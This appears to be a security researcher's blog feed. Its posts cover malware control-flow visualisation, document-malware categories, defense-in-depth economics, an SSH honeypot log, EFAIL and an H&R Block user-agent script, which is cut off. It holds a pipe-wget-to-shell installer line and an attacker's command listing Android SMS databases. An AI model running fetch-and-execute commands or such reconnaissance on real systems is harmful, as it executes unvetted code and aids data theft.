Carter Yagemannhttps://carteryagemann.com/2019-02-21T21:00:00-05:00I'm a computer scientist and cybersecurity researcher. My interests include hacking, system design, and software engineering.Malware Has a Color2019-02-21T21:00:00-05:002019-02-21T21:00:00-05:00Carter Yagemanntag:carteryagemann.com,2019-02-21:/malware-colors.html<p>In an upcoming paper I plan to present some preliminary work in applying machine learning
to program control flows to detect anomalies. Specifically, my coauthors and I demonstrate
how to use this to analyze document malware with promising accuracy. In
<a href="https://carteryagemann.com/doc-mal-categories.html">previous posts</a>, I've detailed the threat malicious documents
pose to users and shared some insights into why this problem remains prevalent. For this post,
I want to switch gears and share a fun technique I use to help understand
what the control flow anomaly detector is really seeing. Put playfully, I'm going to demonstrate how
to spot malware by the color it makes. Enjoy.</p>
<p>Without going into too many details about the system (I'll be sure to make a post about where to
find the paper and code when it becomes available), at a high level we collect and use execution traces of a target
program (e.g. Acrobat Reader) opening benign documents to create a path prediction
model. We then apply the model to an unlabeled trace, the intuition being that any anomalies
will cause a sudden drop in prediction accuracy. There's a little more to it than that, but this is the gist
of how the system operates.</p>
<p>One challenge with such a system is the traces are massive. Even if we narrow our focus to
only indirect control flow transfers (e.g. <code>ret</code>, <code>icall</code>, and <code>ijmp</code>), that's still thousands to
millions of events per minute of real execution time. This makes it challenging to diagnose whether
there was a bug or the malware simply didn't detonate.</p>
<p>One option is to manually analyze the malware sample, typically by running the virtual machine in another
framework. This is time consuming though, which is why I've come up with a niftier solution that involves
visualizing the trace in conjunction with the model's output. This is how I discovered that malware has a
color.</p>
<h2>Visualization Technique</h2>
<p>First, I convert each target address into a color by hashing it. For simplicity, I take the first three
bytes of an <code>md5</code> hash to get an RGB tuple. The reason I use a secure hashing algorithm instead of a simple
checksum is so that nearby addresses produce very different colors, providing contrast. Here's an example of
what a benign trace looks like:</p>
<p><center>
<img alt="Benign Trace" src="https://carteryagemann.com/images/vis-ben1.png">
</center></p>
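<p>To make the hashing step concrete, here's a minimal sketch. The 8-byte little-endian packing of the address is my choice for illustration, not necessarily what the actual tooling does:</p>

```python
import hashlib

def addr_to_rgb(addr):
    # md5 scatters nearby addresses across the color space,
    # so adjacent targets get contrasting colors.
    digest = hashlib.md5(addr.to_bytes(8, 'little')).digest()
    # Take the first three bytes as an RGB tuple.
    return (digest[0], digest[1], digest[2])
```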
<p>We can clearly see patterns, but there's no clear indicator of what makes one normal and another
anomalous. Let's compare with a family of PDF malware that the system is good at detecting: <code>pdfka</code>. Here's one
of the traces:</p>
<p><center>
<img alt="PDFKA Color Trace" src="https://carteryagemann.com/images/vis-pdfka1.png">
</center></p>
<p>Look at that streak of dark blue! What's going on there? Is this an exploit or simply a pattern our previous
example didn't capture? To find out, I create a second image where each target is a white pixel if the
model predicted it correctly and black if the prediction was wrong. Here's the result for the same
trace:</p>
<p><center>
<img alt="PDFKA Model Output" src="https://carteryagemann.com/images/vis-pdfka2.png">
</center></p>
<p>Looks like there's a streak of incorrect predictions that lines up with the dark blue, but let's confirm it
by subtracting the two images. This will cause areas of accurate prediction (white in the second image) to
become black while areas of incorrect predictions will keep their color from the first image. Here's the
result:</p>
<p><center>
<img alt="PDFKA Subtraction" src="https://carteryagemann.com/images/vis-pdfka3.png">
</center></p>
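<p>Conceptually, the subtraction is a masking operation. Here's a sketch using NumPy; the array names and shapes are mine, not taken from the actual tooling:</p>

```python
import numpy as np

def subtract_correct(trace_img, correct):
    # trace_img: (H, W, 3) uint8 colors from the hashed targets.
    # correct:   (H, W) bool, True where the model predicted the target.
    # Correct predictions (white in the mask image) become black,
    # while incorrect ones keep their color from the trace image.
    out = trace_img.copy()
    out[correct] = 0
    return out
```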
<p>Sure enough, that blue streak is an anomaly produced by <code>pdfka</code>. In fact, if we were to visualize all the <code>pdfka</code>
samples in our paper's evaluation dataset, we would find they all contain a blue streak. What the blue is really
visualizing is an exploit (<code>CVE-2010-0188</code>) being carried out against the TIFF parser library in <code>AcroRd32.dll</code>.
Therefore, we can say the color of <code>pdfka</code> is dark blue!</p>
<h2>Other Examples</h2>
<p>To demonstrate the value of subtracting, consider this visualization of opening a Microsoft Word document:</p>
<p><center>
<img alt="MS Word Trace" src="https://carteryagemann.com/images/vis-msword1.png">
</center></p>
<p>You may be tempted to conclude this is a red malware (since coming up with this technique, I've been referring
to malware by their colors instead of family names for fun), but it's actually benign. We can see this in
the subtraction:</p>
<p><center>
<img alt="MS Word Subtraction" src="https://carteryagemann.com/images/vis-msword2.png">
</center></p>
<p>No colors means no anomalies. Now let's see a trace of <code>hancitor</code>:</p>
<p><center>
<img alt="Hancitor" src="https://carteryagemann.com/images/vis-hancitor.png">
</center></p>
<p>As you can see, it's green malware. Meanwhile <code>thus</code> is blue-purple:</p>
<p><center>
<img alt="Thus" src="https://carteryagemann.com/images/vis-thus.png">
</center></p>
<p>I think that's enough examples to make my point. I hope you've been convinced that malware has a color.
Thanks for reading and happy hacking!</p>Upcoming MLsploit Demo at Black Hat Asia 20192019-01-17T17:00:00-05:002019-01-17T17:00:00-05:00Carter Yagemanntag:carteryagemann.com,2019-01-17:/bh-asia-19.html<p>A framework I helped develop called MLsploit will be demoed at Black Hat Asia 2019.
You can read more about it <a href="https://www.blackhat.com/asia-19/arsenal/schedule/index.html#mlsploit-a-cloud-based-framework-for-adversarial-machine-learning-research-14256">here</a>.</p>Three Kinds of Document Malware and Designing Frameworks to Detect Them2018-12-27T12:00:00-05:002018-12-27T12:00:00-05:00Carter Yagemanntag:carteryagemann.com,2018-12-27:/doc-mal-categories.html<p>Lately I've been spending a lot of time with document malware and exploring
techniques for detection. Malicious documents pose interesting challenges and
have become the typical first vector for adversaries to achieve a
foothold. Despite this, document malware seems largely overlooked by academics
compared to their executable counterparts. In short, it's an area worth
exploring.</p>
<p>As I compared the current detection techniques, I noticed the pros and cons
are nuanced. Static analysis is quick and accurate, but very vulnerable to
evasion via adversarial perturbation. Dynamic analysis is slower and error
prone because samples can fail to trigger, but produces richer data.
These characteristics are further amplified by the use of machine learning.
Adding junk bytes between the elements of a PDF can evade a static feature
learner <a href="http://www.ra.cs.uni-tuebingen.de/mitarb/srndic/srndic-laskov-sp2014.pdf">in seconds</a>.
Unfortunately, dynamic features don't fare much <a href="https://evademl.org/docs/evademl.pdf">better</a>.</p>
<p>In time I've begun to formulate a theory that <em>there are currently three kinds of document malware</em>.
By applying this insight, I find I can substantially influence the results of
my experiments. While not as conclusive as something like a double dissociation,
I want to share what I've observed in hopes that it'll inspire others when designing
their detection systems and provoke feedback.</p>
<p>So without further ado, here's my theory. Currently, there are three kinds of
document malware: <strong>exploit-based, abuse-based, and phishing-based</strong>.
While I propose categories, note that they are not mutually exclusive.
Malware authors can always chain and blend
techniques to achieve their goals. Therefore, these categories should be seen as
points on a spectrum. That said, complexity invites failure, so I do not expect
real world authors to stray far from these focal points.
The following paragraphs elaborate on each category in reverse order.</p>
<h3>Phishing-based</h3>
<p>This is the trickiest category for a computer scientist because humans are
complicated and confusing entities. The exemplar of this category is a document
that tries to convince the user to take some compromising action. There may be
a link to a fake website or steps that lead to disabling a security feature.
Admittedly, this is a category I currently steer clear of.
<em>The best solutions are better education, stronger policies, and a clear strategy for recovery when a human mistake is inevitably made.</em>
Also note that this category
is the most likely to be chained with others. For example, a document may need
to lure the victim into clicking a button before a payload can be used. In rare
cases, user interaction may even be leveraged to thwart automated analysis.
Thankfully, I have yet to see a malware author embed a CAPTCHA in their document.</p>
<h3>Abuse-based</h3>
<p>This category does not consider the human user, but distinguishes itself
in how it uses the target application. The exemplar here
is a PDF containing JavaScript or a Word document with macros that uses provided
APIs to download and execute additional malware. The key point to emphasize here
is these documents do not violate the specification of the application.
<em>The program is functioning as intended.</em> This is why I label these instances
as abuse rather than exploitation. This distinction is critical to consider when
designing a detection framework. On the one hand, they're tricky because they
blend in with benign behavior. This is why, for example, looking at system call
sequences is a bad idea for this category. On the other hand, since the program's
integrity isn't compromised, it's safe to make strong assumptions in these
situations. <em>This is where static analysis is best suited.</em> Designed
correctly, such frameworks can leverage strong models of the target program to
accurately and statically detect abuse. This saves resources and minimizes exposure to
noise.</p>
<h3>Exploit-based</h3>
<p>Which brings us to the last category. Here's where we see the stuff 0-days and CVEs
are made from. It's also where all corners of the security community like to
flaunt their technical knowhow with intricate ROP chains and compact shellcode.
Jargon aside,
<em>this category differs from abuse-based in that it does violate the program's specification.</em>
Memory corruption, underflows, overflows, and more are all fair game for achieving
arbitrary code execution. This means the author's attacks can take unusual forms,
like malformed images, and detection frameworks have to cope. For this reason,
<em>this is where dynamic analysis overtakes static.</em> Because exploits by definition
break models and assumptions, the only way towards proactive detection is to actually
trigger them.</p>
<p>I hope readers find this categorization useful. Note that this is not the only way document
malware can be divided. For example, payloads can execute inside the target
application or in a separate process, creating a spectrum of <em>intrinsic</em> versus
<em>extrinsic</em> behaviors. Regardless, my three-category theory has helped me design novel
systems and interpret the evaluation results, so I wanted to share it.</p>
<p>Thanks for reading.</p>Mention for Georgia Tech Vulnerability Disclosure2018-09-05T22:15:00-04:002018-09-05T22:15:00-04:00Carter Yagemanntag:carteryagemann.com,2018-09-05:/gatech-vuln-reporters.html<p>Georgia Tech has <a href="https://security.gatech.edu/vulnerability-reporters">acknowledged me</a> for
a past vulnerability I disclosed to them.</p>The Unfortunate Economics of Defense in Depth2018-08-14T23:30:00-04:002018-08-14T23:30:00-04:00Carter Yagemanntag:carteryagemann.com,2018-08-14:/economics-depth-defense.html<p><center>
<img alt="Castles benefit from defense in depth." src="https://carteryagemann.com/images/castle.jpg">
</center></p>
<p>A mantra we hear all the time in security is the notion of <strong>defense in depth</strong>.
It's applied in numerous areas from protecting computer systems to safeguarding airports.
Anyone who receives formal training in security will likely encounter the term at
least once in their coursework. It's a milestone we are told to strive for when
designing secure systems.</p>
<p>For readers who are unfamiliar with the term, it's the idea that when designing security into
a system, we should place several overlapping layers of defense wherever possible.
The insight behind this idea is that thwarting an attack only requires one layer of defense to
succeed whereas the attacker's success depends on penetrating every layer.
Consider, for example, an invading army storming a castle.
In order for the invasion to succeed, the invaders must survive raining arrows from archers,
traverse a moat, breach the castle walls, and kill the soldiers inside. Failure to surmount
any one of these defenses spells disaster for the attack. Worse yet for the invading army, as long
as each layer's chance of halting the attack is independent of the other layers, adding more layers
makes the attacker's task more likely to fail. On the other hand, this is great news if
you are the one assigned to defend the castle.</p>
<p>Unfortunately, step outside the classroom and it will not take long to run into
the counterforce that stifles an otherwise brilliant concept. The force I am referring
to is <strong>economics</strong>. Defenses don't come for free and as I plan to highlight in this
blog post, there is a fundamental problem with applying <strong>defense in depth</strong> once <strong>economics</strong> enters
the equation.</p>
<p>To aid my explanation, let's use fair coin flips as a simple running example.
Although coins are a far cry from airports or castles, the underlying probabilities behind flipping
a coin are simple to understand and also sufficient to make my point.</p>
<p>As you are probably already
aware, a fair coin flip yields one of two possible outcomes, heads or tails, with equal and
mutually exclusive probabilities. The probability of getting heads once is 50%. Getting heads
twice in a row is 25%. Three times is 12.5%. This probability <em>p</em> is expressed by the following formula for <em>x</em> coin flips:</p>
<p><center>
<img alt="p = 1 / 2^x" src="https://carteryagemann.com/images/coin-flip-prob.jpg">
</center></p>
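<p>In code, the formula is trivial:</p>

```python
def p_all_heads(x):
    # Probability of x fair coin flips all landing heads: p = 1 / 2^x
    return 1 / 2 ** x
```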
<p>If we graph this function for a couple of flips, we get the following figure:</p>
<p><center>
<img alt="Graph 1" src="https://carteryagemann.com/images/coin-flip-fig1.jpg">
</center></p>
<p>As we can see, the probability of getting all heads decays <strong>exponentially</strong> with the number of flips.
The first few additional flips cut the probability dramatically, but each extra flip yields a
smaller and smaller absolute reduction. In other words, the difference in
chance of getting two heads versus three is substantial, but the difference between 999 and
1,000 heads is comparatively minuscule. Tying this analogy back to security, if we map the outcome of heads
to the attacker successfully breaching a layer of security, we can see how overlapping a few defensive layers
can offer significantly better security and reduce the attacker's chance of success. However, with
each additional layer, the defender's gain diminishes. Regardless, this outcome shows that defense
in depth is fundamentally valuable and we can safely apply it in the real world as long as
the effectiveness of the layers being evaluated are completely (or at least nearly) independent to each other.</p>
<p>Unfortunately, as I alluded to in the introduction, every layer of defense has a cost to design, implement,
deploy, and maintain. If these costs are also completely (or at least nearly) independent, a problem arises.
Namely, each additional layer raises the cost of the overall defense <strong>linearly</strong>, but the return yielded
in security diminishes <strong>exponentially</strong>. Returning to our running example, now consider the case where each flip
costs one unit of resource to perform. If we add this function to our previous graph, we get the
following figure:</p>
<p><center>
<img alt="Graph 2" src="https://carteryagemann.com/images/coin-flip-fig2.jpg">
</center></p>
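<p>Sticking with the coin-flip model, the mismatch is easy to make concrete: every layer costs the same one unit, but the marginal security gain halves each time:</p>

```python
def marginal_gain(x):
    # Drop in the attacker's success probability from adding the x-th layer,
    # under the coin-flip model: 1/2^(x-1) - 1/2^x = 1/2^x.
    return 1 / 2 ** (x - 1) - 1 / 2 ** x

# Layer 1 buys 0.5 of security, layer 2 buys 0.25,
# and layer 10 buys less than 0.001 -- all at the same unit cost.
```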
<p>And if we reformat this graph to show the proportional gain in cost to the gain in security, we get:</p>
<p><center>
<img alt="Graph 3" src="https://carteryagemann.com/images/coin-flip-fig3.jpg">
</center></p>
<p>Put plainly, the cost of using defense in depth to achieve <strong>decent</strong> security is relatively <strong>cheap</strong>, but
achieving <strong>exceptional</strong> security is extremely <strong>expensive</strong>. This is bad news for the defender and a
fundamental limitation to the idea of defense in depth.</p>
<p>Hopefully you now understand the title of this blog post and realize why this relationship is important
to grasp. For example, understanding this topic helps explain the controversies and debates surrounding
the cost of funding the Transportation Security Administration's twenty "Layers of Security" framework:</p>
<p><center>
<img alt="The TSA's Layers of Security." src="https://carteryagemann.com/images/tsa-layers.jpg">
</center></p>
<p>I'll forgo an in-depth analysis of this chart since other researchers have already examined it in
<a href="http://a.co/bSrRjVP">great detail</a>, but to summarize, if you pick a relevant threat to airport
security and consider each layer's effect on stopping it, you'll realize removing any one layer has
seemingly little impact on the overall risk of failure. This raises the question of whether there are layers that
can be removed to significantly reduce cost without significantly reducing security. Certainly an
idea worth exploring, if the science can be separated from the politics. Until then, I hope you've found this
blog post interesting and insightful.</p>Paper Accepted to ACM CCS 20182018-07-23T22:00:00-04:002018-07-23T22:00:00-04:00Carter Yagemanntag:carteryagemann.com,2018-07-23:/ccs18-publication.html<p>A paper I co-authored has been accepted to the <em>25th ACM Conference on Computer and
Communications Security</em> (CCS'18) being held in Toronto, Canada from October
15, 2018 to October 19, 2018.</p>
<p><strong>Title:</strong> Enforcing Unique Code Target Property for Control-Flow Integrity</p>
<p><strong>Authors:</strong> Hong Hu, Chenxiong Qian, <em>Carter Yagemann</em>, Simon Pak Ho Chung,
Bill Harris, Taesoo Kim, Wenke Lee</p>
<p><strong>Abstract:</strong></p>
<p>The goal of control-flow integrity (CFI) is to stop control-hijacking attacks by ensuring that each indirect control-flow transfer (ICT) jumps to its legitimate target. However, existing implementations of CFI have fallen short of this goal because their approaches are inaccurate and as a result, the set of allowable targets for an ICT instruction is too large, making illegal jumps possible.</p>
<p>In this paper, we propose the Unique Code Target (UCT) property for CFI. Namely, for each invocation of an ICT instruction, there should be one and only one valid target. We develop a prototype called uCFI to enforce this new property. During compilation, uCFI identifies the sensitive instructions that influence ICT and instruments the program to record necessary execution context. At runtime, uCFI monitors the program execution in a different process, and performs points-to analysis by interpreting sensitive instructions using the recorded execution context in a memory safe manner. It checks runtime ICT targets against the analysis results to detect CFI violations. We apply uCFI to SPEC benchmarks and 2 servers (nginx and vsftpd) to evaluate its efficacy of enforcing UCT and its overhead. We also test uCFI against control-hijacking attacks, including 5 real-world exploits, 1 proof of concept COOP attack, and 2 synthesized attacks that bypass existing defenses. The results show that uCFI strictly enforces the UCT property for protected programs, successfully detects all attacks, and introduces less than 10% performance overhead.</p>Weird Things Are Afoot In The Honeypot2018-05-30T11:00:00-04:002018-05-30T11:00:00-04:00Carter Yagemanntag:carteryagemann.com,2018-05-30:/android-ssh.html<p>Here's something you don't see every day. The logs from my SSH honeypot show
someone brute-forcing the password for root and then executing:</p>
<div class="highlight"><pre><span></span>ls /data/data/com.android.providers.telephony/databases
</pre></div>
<p>This is a strange directory to look for because it's where Android devices
store the SQLite databases for SMS messages and contacts. Why would an attacker
expect an SSH server on the internet to be an Android device? Are there IoT
devices based on Android that run SSH servers and also store contacts? If
someone knows, please tell me!</p>EFF and EFAIL: An Example of Hype Culture Gone Awry2018-05-14T21:30:00-04:002018-05-14T21:30:00-04:00Carter Yagemanntag:carteryagemann.com,2018-05-14:/eff-efail.html<p>I usually try to keep my blog posts technical and free of politics, but
I can't hide my frustration over EFF's response to today's release of the
<a href="https://efail.de/">EFAIL</a> vulnerability.</p>
<p>If you haven't heard by now, EFAIL is the
name of a vulnerability having to do with how email clients like Thunderbird handle PGP
encrypted emails. This vulnerability allows a strong adversary to decrypt
emails given that they have previously encrypted messages from a victim, can
tamper with emails in-transit, and assuming the victim's client is configured to
automatically fetch remote content.</p>
<p>I emphasize the word <em>strong</em> because
any security researcher can see that these preconditions mean this attack
is only a concern to individuals being targeted by nation-states.
As many Slashdot users and companies like ProtonMail
<a href="https://protonmail.com/blog/pgp-vulnerability-efail/">have pointed out</a>,
this vulnerability is over-hyped, blown out of proportion,
and the course of action being loudly proposed is somewhere between
draconian and moronic.</p>
<p>Unfortunately, it seems EFF is at the forefront of this
<a href="https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now">crusade</a>
to misguide users. Within hours of the details being released,
EFF published a blog post advising everyone to immediately stop using PGP.
Since then, less than 24 hours later, EFF has published over <strong>13</strong> articles
driving home the "crisis" and providing step-by-step tutorials on how to
"take action" by
<a href="https://www.eff.org/deeplinks/2018/05/disabling-pgp-thunderbird-enigmail">disabling PGP</a>
and
<a href="https://www.eff.org/deeplinks/2018/05/using-command-line-decrypt-message-linux">decrypting emails</a>.
It is impressive that EFF has managed to write so much about EFAIL
in so little time.</p>
<p>As a security researcher, allow me to share a piece of wisdom echoed by many
of my peers. <em>The appropriate reaction to a vulnerability that can potentially
decrypt emails <strong>is not</strong> to start sending messages in plaintext</em>.
Sane people don't erase their operating system because of a bug, disable their
firewall because of a glitch, or stop using encryption because of a flawed
implementation. Decide how big of a risk EFAIL is to you, come up with a plan
for remediation based on that risk, and apply software patches when they become
available. For most users, this boils down to simply continuing your good security habits.
Disabling security in response to a bug is insanity.</p>
<p><strong>Shame on EFF for over-hyping vulnerabilities and giving terrible security advice!</strong></p>Debian Apt Repo for libipt2018-02-24T18:30:00-05:002018-02-24T18:30:00-05:00Carter Yagemanntag:carteryagemann.com,2018-02-24:/libipt-repo.html<p>As part of my Ph.D. research, I play around with Intel Processor Trace a lot.
As a result, I frequently use <a href="https://github.com/01org/processor-trace">libipt</a>;
both as a library for my own software and for the reference programs it includes.
<code>ptdump</code> and <code>ptxed</code> are my go-to utilities for quickly checking and
manipulating traces. They're super useful!</p>
<p>Sadly on Debian and Ubuntu, the default package repositories only have a package
for the main library (no pre-compiled program binaries) that is woefully out
of date (last updated in 2016). Having to repeatedly compile
<a href="https://github.com/intelxed/xed">xed</a> and
<a href="https://github.com/01org/processor-trace">libipt</a>
from source quickly got annoying, so I've decided to publish my own repository. I've
also made it public in hopes that others will find it useful.</p>
<p>The repository tracks the master branch on <a href="https://github.com/01org/processor-trace">libipt</a>
and <a href="https://github.com/intelxed/xed">xed</a>, so its packages should always contain
the latest code. I've made adding it to apt super easy:</p>
<div class="highlight"><pre><span></span>sh -c <span class="s2">&quot;</span><span class="k">$(</span>wget -qO - https://super.gtisc.gatech.edu/libipt.sh<span class="k">)</span><span class="s2">&quot;</span>
</pre></div>
<p>It currently has the following libraries:</p>
<ul>
<li>libxed</li>
<li>libxed-dev</li>
<li>libipt (includes the sideband library)</li>
</ul>
<p>And the following pre-compiled programs:</p>
<ul>
<li>ptdump</li>
<li>pttc</li>
<li>ptxed</li>
</ul>
<p>More information about these libraries and programs is available in their respective
documentation. I hope to add more packages in the coming days.</p>
<p>For people interested in learning how to host their own repositories, I built this
server using <a href="https://www.gocd.org/">gocd</a>, <a href="https://www.aptly.info/">aptly</a>, and
<a href="https://httpd.apache.org/">apache</a>.</p>H&R Block "MyBlock" App + USA Government Website Analytics = PROFIT2018-02-09T16:00:00-05:002018-02-09T16:00:00-05:00Carter Yagemanntag:carteryagemann.com,2018-02-09:/hrb-analytics.html<p>I like data mining. For better or worse, it's the gold of the digital age. So
when the USA government decided to make the analytical data for their publicly
facing websites available for <a href="https://analytics.usa.gov/data/">download</a>, I
jumped at the opportunity. Thanks to this lovely data source, I can get
insights into how popular various browsers and operating systems are, how
frequently devices connect to USA government websites from foreign IP
addresses, and more.</p>
<p>Sadly, the website only offers metrics for the past 30 days. Luckily, it's
pretty easy to set up a Raspberry Pi or other small device to periodically fetch
the freshest numbers and build a larger dataset. This is what I've been doing
since August of 2016. <strong>If you're interested, send me an email and I'll be happy
to share</strong>. After all, according to the government's website: <em>"this website and
its data are free for you to use without restriction."</em></p>
<p>Continuing my story, I was skimming over the most recent metrics when I noticed
a funny browser user-agent:</p>
<div class="highlight"><pre><span></span>HRB-MOBILE-IOS-PHONE-MYBLOCK-TOUCHID-6.1.0-Mozilla
</pre></div>
<p>With a quick search, I figured out that
<a href="https://itunes.apple.com/us/app/my-block/id490111274">MyBlock</a> is a mobile app
offered by H&amp;R Block. More interesting though is the juicy information H&amp;R
Block decided to embed in these user-agent strings. As we can see, they contain
the name of the app, the version number, the OS (iOS or Android), the
device form factor (phone or tablet), and in the case of iOS, it even mentions
if TouchID or FaceID was used. As a security researcher, I'm particularly
interested in this last tidbit because people use H&amp;R Block to file taxes and
these user-agents started appearing January 7, 2018 (i.e., tax season). So how
many people use the various authentication methods offered by Apple to protect
their tax filing app? Let's find out!</p>
<p>The following is a small Python script I wrote to filter the data. The parsing
and filtering leaves much to be desired, but I didn't want to spend too much time
on such a simple task:</p>
<div class="highlight"><pre><span></span><span class="ch">#!/usr/bin/env python</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="k">def</span> <span class="nf">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">):</span>
<span class="sd">&quot;&quot;&quot; Parses subtokens and returns a dictionary. If invalid, None is returned.</span>
<span class="sd"> We expect Android user agents to be in the form of:</span>
<span class="sd"> HRB MOBILE ANDROID [PHONE|TABLET] MYBLOCK [VERSION] &lt;BROWSER&gt;</span>
<span class="sd"> and iOS user agents to be in the form of:</span>
<span class="sd"> HRB MOBILE IOS [PHONE|TABLET] MYBLOCK &lt;TOUCHID|FACEID&gt; [VERSION] [BROWSER]</span>
<span class="sd"> &quot;&quot;&quot;</span>
<span class="n">res</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;HRB&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;MOBILE&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;ANDROID&#39;</span> <span class="ow">and</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;IOS&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;OS&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;PHONE&#39;</span> <span class="ow">and</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;TABLET&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;DEVICE&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;MYBLOCK&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;APP&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;ANDROID&#39;</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;N/A&#39;</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;N/A&#39;</span>
<span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;N/A&#39;</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;IOS&#39;</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;N/A&#39;</span>
<span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">3</span><span class="p">]</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="c1"># Cleanups:</span>
<span class="c1"># 1) Some versions of the Android app prefix &#39;v&#39; onto version</span>
<span class="k">if</span> <span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;v&#39;</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">][</span><span class="mi">1</span><span class="p">:]</span>
<span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="o">==</span> <span class="mi">6</span>
<span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">is_hrb</span><span class="p">(</span><span class="n">year</span><span class="p">,</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">):</span>
<span class="sd">&quot;&quot;&quot; Validate that a line should be parsed and added to the buckets.</span>
<span class="sd"> Specifically, entry should contain the right year, be a HRB user-agent,</span>
<span class="sd"> and contain the filter keyword if one was provided.</span>
